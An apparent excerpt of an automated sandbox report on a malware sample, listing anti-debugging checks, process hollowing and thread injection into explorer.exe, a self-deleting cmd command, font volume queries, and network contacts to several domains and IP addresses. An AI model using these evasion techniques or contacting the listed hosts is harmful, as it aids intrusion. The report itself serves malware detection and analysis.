Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h] 16_2_052AB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D131B mov eax, dword ptr fs:[00000030h] 16_2_052D131B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521DB60 mov ecx, dword ptr fs:[00000030h] 16_2_0521DB60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05243B7A mov eax, dword ptr fs:[00000030h] 16_2_05243B7A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05243B7A mov eax, dword ptr fs:[00000030h] 16_2_05243B7A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521DB40 mov eax, dword ptr fs:[00000030h] 16_2_0521DB40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8B58 mov eax, dword ptr fs:[00000030h] 16_2_052E8B58
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521F358 mov eax, dword ptr fs:[00000030h] 16_2_0521F358
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h] 16_2_05244BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h] 16_2_05244BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h] 16_2_05244BAD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E5BA5 mov eax, dword ptr fs:[00000030h] 16_2_052E5BA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D138A mov eax, dword ptr fs:[00000030h] 16_2_052D138A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CD380 mov ecx, dword ptr fs:[00000030h] 16_2_052CD380
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05221B8F mov eax, dword ptr fs:[00000030h] 16_2_05221B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05221B8F mov eax, dword ptr fs:[00000030h] 16_2_05221B8F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242397 mov eax, dword ptr fs:[00000030h] 16_2_05242397
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524B390 mov eax, dword ptr fs:[00000030h] 16_2_0524B390
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h] 16_2_052403E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523DBE9 mov eax, dword ptr fs:[00000030h] 16_2_0523DBE9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052953CA mov eax, dword ptr fs:[00000030h] 16_2_052953CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052953CA mov eax, dword ptr fs:[00000030h] 16_2_052953CA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05254A2C mov eax, dword ptr fs:[00000030h] 16_2_05254A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05254A2C mov eax, dword ptr fs:[00000030h] 16_2_05254A2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h] 16_2_0523A229
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05228A0A mov eax, dword ptr fs:[00000030h] 16_2_05228A0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05215210 mov eax, dword ptr fs:[00000030h] 16_2_05215210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05215210 mov ecx, dword ptr fs:[00000030h] 16_2_05215210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05215210 mov eax, dword ptr fs:[00000030h] 16_2_05215210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05215210 mov eax, dword ptr fs:[00000030h] 16_2_05215210
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521AA16 mov eax, dword ptr fs:[00000030h] 16_2_0521AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521AA16 mov eax, dword ptr fs:[00000030h] 16_2_0521AA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DAA16 mov eax, dword ptr fs:[00000030h] 16_2_052DAA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DAA16 mov eax, dword ptr fs:[00000030h] 16_2_052DAA16
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05233A1C mov eax, dword ptr fs:[00000030h] 16_2_05233A1C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CB260 mov eax, dword ptr fs:[00000030h] 16_2_052CB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CB260 mov eax, dword ptr fs:[00000030h] 16_2_052CB260
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8A62 mov eax, dword ptr fs:[00000030h] 16_2_052E8A62
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525927A mov eax, dword ptr fs:[00000030h] 16_2_0525927A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219240 mov eax, dword ptr fs:[00000030h] 16_2_05219240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219240 mov eax, dword ptr fs:[00000030h] 16_2_05219240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219240 mov eax, dword ptr fs:[00000030h] 16_2_05219240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219240 mov eax, dword ptr fs:[00000030h] 16_2_05219240
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DEA55 mov eax, dword ptr fs:[00000030h] 16_2_052DEA55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052A4257 mov eax, dword ptr fs:[00000030h] 16_2_052A4257
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h] 16_2_052152A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h] 16_2_052152A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h] 16_2_052152A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h] 16_2_052152A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h] 16_2_052152A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0522AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522AAB0 mov eax, dword ptr fs:[00000030h] 16_2_0522AAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524FAB0 mov eax, dword ptr fs:[00000030h] 16_2_0524FAB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524D294 mov eax, dword ptr fs:[00000030h] 16_2_0524D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524D294 mov eax, dword ptr fs:[00000030h] 16_2_0524D294
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242AE4 mov eax, dword ptr fs:[00000030h] 16_2_05242AE4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242ACB mov eax, dword ptr fs:[00000030h] 16_2_05242ACB
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00409B30 LdrLoadDll, 11_2_00409B30
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thietkenoithatvanphong.asia
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 222.255.46.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.116 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.desertbirdmercantile.com
Source: C:\Windows\explorer.exe Domain query: www.yzztx.com
Source: C:\Windows\explorer.exe Domain query: www.sigmamu.com
Source: C:\Windows\explorer.exe Network Connect: 154.214.67.82 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: B10000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Memory written: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread register set: target process: 3292 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Process created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe" Jump to behavior
Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager
Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.317315984.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000D.00000000.306717343.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.342987929.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400324012.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.327885789.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000D.00000000.335543509.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.320761476.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
